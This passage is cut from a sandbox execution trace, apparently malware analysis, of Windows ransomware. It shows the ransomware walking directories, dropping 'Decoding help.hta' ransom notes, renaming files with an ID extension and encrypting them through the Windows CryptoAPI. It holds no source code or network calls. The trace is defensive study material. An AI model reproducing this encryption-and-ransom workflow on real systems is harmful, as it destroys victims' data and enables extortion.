returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0040.467] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0040.467] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f874b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.468] CloseHandle (hObject=0x1c4) returned 1 [0040.468] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0040.468] lstrcmpW (lpString1=".", lpString2="Start Menu") returned -1 [0040.468] lstrcmpW (lpString1="..", lpString2="Start Menu") returned -1 [0040.468] lstrcmpiW (lpString1="windows", lpString2="Start Menu") returned 1 [0040.469] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Start Menu" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu" [0040.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*" [0040.470] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f9f518, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.470] CloseHandle (hObject=0x1c4) returned 1 [0040.471] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0040.471] lstrcmpW (lpString1=".", lpString2="Templates") returned -1 [0040.471] lstrcmpW (lpString1="..", lpString2="Templates") returned -1 [0040.471] lstrcmpiW (lpString1="windows", lpString2="Templates") returned 1 [0040.473] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.473] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Templates" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates" [0040.473] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*" [0040.473] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.473] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10fb7580, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.474] CloseHandle (hObject=0x1c4) returned 1 [0040.474] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x100b5610, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x100b5610, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0040.474] lstrcmpW (lpString1=".", lpString2="Videos") returned -1 [0040.474] lstrcmpW (lpString1="..", lpString2="Videos") returned -1 [0040.474] lstrcmpiW (lpString1="windows", lpString2="Videos") returned 1 [0040.475] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0040.475] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned 37 [0040.475] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0040.476] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0040.476] GlobalMemoryStatus (in: lpBuffer=0x558fd10 | out: lpBuffer=0x558fd10) [0040.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10fcf5e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0040.477] CloseHandle (hObject=0x1c4) returned 1 [0040.477] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x558fd30 | out: lpFindFileData=0x558fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x100b5610, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x100b5610, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0040.477] FindClose (in: hFindFile=0x5a53f0 | out: hFindFile=0x5a53f0) returned 1 Thread: id = 47 os_tid = 0xaf0 [0039.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*.*", lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 48 os_tid = 0xaf4 [0039.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\*.*", lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0039.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.237] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.237] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.237] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734f7d60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7577bc60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7577bc60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre7", cAlternateFileName="")) returned 1 [0039.237] lstrcmpW (lpString1=".", lpString2="jre7") returned -1 [0039.237] lstrcmpW (lpString1="..", lpString2="jre7") returned -1 [0039.237] lstrcmpiW (lpString1="windows", lpString2="jre7") returned 1 [0039.239] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" [0039.239] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned 35 [0039.239] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\", lpString2="jre7" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7" [0039.239] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\*.*" [0039.239] GlobalMemoryStatus (in: lpBuffer=0x56cfd10 | out: lpBuffer=0x56cfd10) [0039.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9659e88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x188 [0039.254] CloseHandle (hObject=0x188) returned 1 [0039.254] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e2d4d90, ftCreationTime.dwHighDateTime=0x1d4af10, ftLastAccessTime.dwLowDateTime=0x814b9d70, ftLastAccessTime.dwHighDateTime=0x1d504d1, ftLastWriteTime.dwLowDateTime=0x814b9d70, ftLastWriteTime.dwHighDateTime=0x1d504d1, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="teachers.exe", cAlternateFileName="")) returned 1 [0039.254] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" [0039.254] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned 35 [0039.254] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\Decoding help.hta" [0039.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\decoding help.hta")) returned 0xffffffff [0039.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.254] WriteFile (in: hFile=0x188, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x56cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x56cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.255] CloseHandle (hObject=0x188) returned 1 [0039.255] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.256] lstrcmpiW (lpString1="Decoding help.hta", lpString2="teachers.exe") returned -1 [0039.256] lstrlenW (lpString="teachers.exe") returned 12 [0039.256] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\*.*" [0039.256] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\*.*") returned 35 [0039.256] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\", lpString2="teachers.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe") returned="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe" [0039.256] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe") returned="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe" [0039.256] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe" (normalized: "c:\\program files (x86)\\java\\teachers.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\teachers.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\teachers.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0039.257] CreateFileMappingA (hFile=0x188, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1e8 [0039.257] CryptAcquireContextA (in: phProv=0x56cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x56cfcec*=0x5b0220) returned 1 [0039.258] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x56cfce8 | out: phKey=0x56cfce8*=0x5a54f0) returned 1 [0039.258] CryptExportKey (in: hKey=0x5a54f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x56cfbe4, pdwDataLen=0x56cfce4 | out: pbData=0x56cfbe4*, pdwDataLen=0x56cfce4*=0x2c) returned 1 [0039.258] MapViewOfFile (hFileMappingObject=0x1e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.260] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x56cfbe4*, pdwDataLen=0x56cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x56cfbe4*, pdwDataLen=0x56cfcf8*=0x100) returned 1 [0039.260] CryptEncrypt (in: hKey=0x5a54f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x56cfce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x510000*, pdwDataLen=0x56cfce4*=0x12800) returned 1 [0039.261] UnmapViewOfFile (lpBaseAddress=0x510000) returned 1 [0039.263] CloseHandle (hObject=0x1e8) returned 1 [0039.263] CryptDestroyKey (hKey=0x5a54f0) returned 1 [0039.263] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.263] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.263] WriteFile (in: hFile=0x188, lpBuffer=0x56cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x56cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x56cfbe4*, lpNumberOfBytesWritten=0x56cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.263] WriteFile (in: hFile=0x188, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x56cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x56cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.264] CloseHandle (hObject=0x188) returned 1 [0039.265] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\teachers.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.265] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e2d4d90, ftCreationTime.dwHighDateTime=0x1d4af10, ftLastAccessTime.dwLowDateTime=0x814b9d70, ftLastAccessTime.dwHighDateTime=0x1d504d1, ftLastWriteTime.dwLowDateTime=0x814b9d70, ftLastWriteTime.dwHighDateTime=0x1d504d1, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="teachers.exe", cAlternateFileName="")) returned 0 [0039.265] FindClose (in: hFindFile=0x5a54b0 | out: hFindFile=0x5a54b0) returned 1 Thread: id = 49 os_tid = 0xaf8 [0039.247] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5370 [0039.251] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.251] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.251] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.251] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0039.251] lstrcmpW (lpString1=".", lpString2="v3.5") returned -1 [0039.251] lstrcmpW (lpString1="..", lpString2="v3.5") returned -1 [0039.251] lstrcmpiW (lpString1="windows", lpString2="v3.5") returned 1 [0039.253] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*" [0039.253] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*") returned 61 [0039.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\", lpString2="v3.5" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5" [0039.253] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*" [0039.253] GlobalMemoryStatus (in: lpBuffer=0x580fd10 | out: lpBuffer=0x580fd10) [0039.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96a1fc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0039.273] CloseHandle (hObject=0x1a4) returned 1 [0039.273] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x580fd30 | out: lpFindFileData=0x580fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0039.273] FindClose (in: hFindFile=0x5a5370 | out: hFindFile=0x5a5370) returned 1 Thread: id = 50 os_tid = 0xafc [0039.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*.*", lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52b0 [0039.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.272] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.272] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.272] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x594fd30 | out: lpFindFileData=0x594fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0039.272] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.272] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.272] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" [0039.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" (normalized: "c:\\boot\\fonts\\decoding help.hta")) returned 0xffffffff [0039.272] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta" (normalized: "c:\\boot\\fonts\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.279] WriteFile (in: hFile=0x1ac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x594fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x594fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.280] CloseHandle (hObject=0x1ac) returned 1 [0039.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.280] lstrcmpiW (lpString1="Decoding help.hta", lpString2="chs_boot.ttf") returned 1 [0039.280] lstrlenW (lpString="chs_boot.ttf") returned 12 [0039.280] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\Fonts\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*.*") returned="\\\\?\\C:\\Boot\\Fonts\\*.*" [0039.280] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\*.*") returned 21 [0039.280] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts\\", 